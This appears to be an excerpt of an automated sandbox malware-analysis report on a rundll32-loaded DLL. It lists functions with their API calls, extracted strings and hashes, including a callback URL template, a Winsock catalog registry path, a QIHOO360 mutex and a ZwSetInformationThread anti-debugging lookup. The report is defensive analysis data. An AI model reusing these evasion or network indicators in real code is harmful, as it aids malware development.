Function 00000001800442DC Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180044380
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 000000018004439C
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443B5
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443CB
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443D9

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180057FF0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

WindowFromPoint.USER32 ref: 000000018005802B
GetAncestor.USER32 ref: 0000000180058051
GetWindowRect.USER32 ref: 0000000180058071
memset.MSVCRT ref: 00000001800580D5
StrCmpIW.SHLWAPI ref: 00000001800580F6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Window$AncestorFromPointRectmemset
String ID:
API String ID: 3039914759-0
Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004B34 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 0000000180004B51
iswspace.MSVCRT ref: 0000000180004B62
_errno.MSVCRT ref: 0000000180004BC5
memmove.MSVCRT ref: 0000000180004BE4
_errno.MSVCRT ref: 0000000180004C25

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errnoiswspace$memmove
String ID:
API String ID: 972559988-0
Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEB4CC Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00000235B5CEB59C
wsprintfW.USER32 ref: 00000235B5CEB5EE
CreateProcessW.KERNEL32 ref: 00000235B5CEB63D
CloseHandle.KERNEL32 ref: 00000235B5CEB650
CloseHandle.KERNEL32 ref: 00000235B5CEB65B

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$CreateProcess
String ID:
API String ID: 2803068115-0
Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction ID: 4e45c5a8afc82dfc7264702fde132968c34a295e531c5512e229503a4e6e037e
Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction Fuzzy Hash: B641E972149F9196EAA4DB10E4483AAF7A2F784748F404825E68D43A6CEF7CD65DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010EFC Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180011890: EnterCriticalSection.KERNEL32 ref: 00000001800118C7
Part of subcall function 0000000180011890: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180011949
Part of subcall function 0000000180011890: LeaveCriticalSection.KERNEL32 ref: 0000000180011965

DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180010F28

Part of subcall function 00000001800101E0: ??3@YAXPEAX@Z.MSVCRT ref: 000000018001021F

??3@YAXPEAX@Z.MSVCRT ref: 0000000180010F67
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FCC
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FE2
DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180011004

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalSection$Delete$EnterLeave
String ID:
API String ID: 274858031-0
Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072640 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072658

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072700 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072718

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800543E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544D5
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544FA
??3@YAXPEAX@Z.MSVCRT ref: 000000018005469A

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800543EC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800546E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547CD
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180054933

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800546F0

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C374 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140synchronizationtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000C3B5
ReleaseMutex.KERNEL32 ref: 000000018000C520

Strings

%I64d, xrefs: 000000018000C3DE
__LastModified__, xrefs: 000000018000C43A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Time$FileMutexReleaseSystem
String ID: %I64d$__LastModified__
API String ID: 4233779698-1650611527
Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180048BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180048C08

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 0000000180048D8C: _vsnwprintf_s.LEGACY_STDIO_DEFINITIONS ref: 0000000180048DAE

IsBadStringPtrW.KERNEL32 ref: 0000000180048CE6

Strings

com, xrefs: 0000000180048C0D, 0000000180048C4F
error_code, xrefs: 0000000180048C48

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: HeapProcessString_vsnwprintf_smemset
String ID: com$error_code
API String ID: 3912638396-1490343999
Opcode ID: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
Opcode Fuzzy Hash: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D00C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000D094
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018000D132
GetLastError.KERNEL32 ref: 000000018000D13C

Strings

http://%s/wcheckquery, xrefs: 000000018000D012

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinmemset
String ID: http://%s/wcheckquery
API String ID: 1980634866-481256882
Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96sleeplibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,000000018001AEC5), ref: 00000001800747AB
Sleep.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074840
SetLastError.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074885

Strings

InitOnceExecuteOnce, xrefs: 00000001800747A1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressErrorLastProcSleep
String ID: InitOnceExecuteOnce
API String ID: 299661913-4081768745
Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042088 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800421A6

Strings

nct, xrefs: 000000018004217C
mpt, xrefs: 0000000180042158
emc, xrefs: 0000000180042137

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: emc$mpt$nct
API String ID: 0-4018135154
Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CCA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000018005CD59
GetProcAddress.KERNEL32 ref: 000000018005CD6E

Strings

ZwSetInformationThread, xrefs: 000000018005CD64
NTDLL.DLL, xrefs: 000000018005CD52

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$ZwSetInformationThread
API String ID: 1646373207-2735485441
Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F014 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32 ref: 000000018005F105

Strings

DELETE FROM 'MT', xrefs: 000000018005F06D
update sqlite_sequence set seq = 0 where name='MT';, xrefs: 000000018005F0DF
select * from sqlite_sequence;, xrefs: 000000018005F0A6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: MutexRelease
String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
API String ID: 1638419-14785165
Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005C9F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005CA65
_time64.MSVCRT ref: 000000018005CA9D

Strings

MsgCenter, xrefs: 000000018005CA28
opentime_afterupdate, xrefs: 000000018005CA52

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Value_time64
String ID: MsgCenter$opentime_afterupdate
API String ID: 785988768-2434204715
Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_wcslwr.MSVCRT ref: 000000018005CE1F
memset.MSVCRT ref: 000000018005CE61
??2@YAPEAX_K@Z.MSVCRT ref: 000000018005CE89

Strings

Global\QIHOO360_%s, xrefs: 000000018005CE6B

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@_wcslwrmemset
String ID: Global\QIHOO360_%s
API String ID: 2483156104-3710684550
Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
